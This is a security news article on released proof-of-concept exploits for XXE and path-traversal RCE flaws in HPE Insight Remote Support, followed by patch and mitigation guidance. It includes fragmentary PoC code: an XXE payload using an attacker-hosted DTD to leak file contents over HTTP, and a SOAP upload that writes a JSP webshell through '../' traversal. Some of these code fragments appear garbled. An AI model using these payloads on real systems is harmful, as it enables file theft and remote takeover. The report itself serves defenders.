Security researchers have released proof-of-concept (PoC) exploit code for critical vulnerabilities in Hewlett Packard Enterprise’s (HPE) Insight Remote Support (IRS) tool, including an unauthenticated XML External Entity (XXE) injection flaw (CVE-2024-53675) and a path traversal-based remote code execution (RCE) vulnerability (CVE-2024-53676).
These flaws affect IRS versions prior to v7.14.0.629 and expose systems to arbitrary file disclosure and full SYSTEM-level command execution.
Technical Breakdown of Exploitation Chain
XXE Vulnerability in Device Registration Workflow (CVE-2024-53675)
The XXE vulnerability originates in the validateAgainstXSD method of HPE’s ucacore library, which processes XML input during device registration without proper Document Type Definition (DTD) restrictions, as per a report by Github.
Attackers can exploit this by injecting malicious XML entities into the
Below is an abridged PoC exploiting the XXE to exfiltrate the first line of C:usersAdministratorDesktophello.txt:
http://www.hp.com/it/sa/reg/Registration/RegisterDevice
&callhome;]]>
The attacker-hosted malicious.dtd forces the XML parser to leak file contents through an HTTP request:
">
%eval;
%exfiltrate;Path Traversal to RCE (CVE-2024-53676)
The RCE vulnerability resides in the processAtatchmentDataStream method of the DataPackageReceiverWebSvcHelper class.
This function improperly validates the attachmentName parameter during file uploads to the /DataPackageReceiver/DataPackageReceiverService.svc endpoint, enabling directory traversal.
Attackers can upload malicious JSP files to arbitrary directories (e.g., Tomcat web roots) by crafting SOAP requests with ../ sequences:
xml_body = f"""
../../webapps/ROOT/shell.jsp
{base64.b64encode(malicious_jsp).decode()}
"""The vulnerability stems from unvalidated concatenation of attachmentFileLocation, allowing attackers to override critical system files:
String attachmentFileLocation = attachmentFileDirectory + File.separatorChar + attachmentName;
File file = new File(attachmentFileLocation);
file.createNewFile(); // Writes attacker-controlled content to arbitrary pathsWhile the XXE exploit reliably leaks first-line file contents, researchers noted limitations in retrieving multi-line files due to parser constraints.
The RCE exploit, however, faces a critical dependency: successful exploitation requires a valid oosId (device registration token) and registrationToken, which attackers must obtain via other means (e.g., brute-forcing or leveraging the XXE to steal tokens).
In lab environments, unregistered devices triggered errors that halted attachment processing:
[ERROR] DataPackageReceiverWebSvcHelper: This device (oosId: 93f6…e39) is not found…aborted processing.
Despite this, attackers with valid credentials (e.g., compromised partner accounts) could chain both vulnerabilities to:
- Steal oosId/registrationToken via XXE
- Upload JSP webshells via RCE
Mitigation and Patch Status
HPE addressed both issues in IRS v7.14.0.629 through:
- Disabling DTD processing in XML validators
- Implementing input sanitization for attachmentName parameters
- Adding authentication checks for device registration workflows
Organizations using IRS should immediately upgrade to the patched version and audit logs for suspicious SOAP requests to /DeviceRegistration or /DataPackageReceiver endpoints.
Network defenders can also block external access to these paths if HPE IRS operates in an internal-only capacity.
Collect Threat Intelligence on the Latest Malware and Phishing Attacks with ANY.RUN TI Lookup -> Try for free
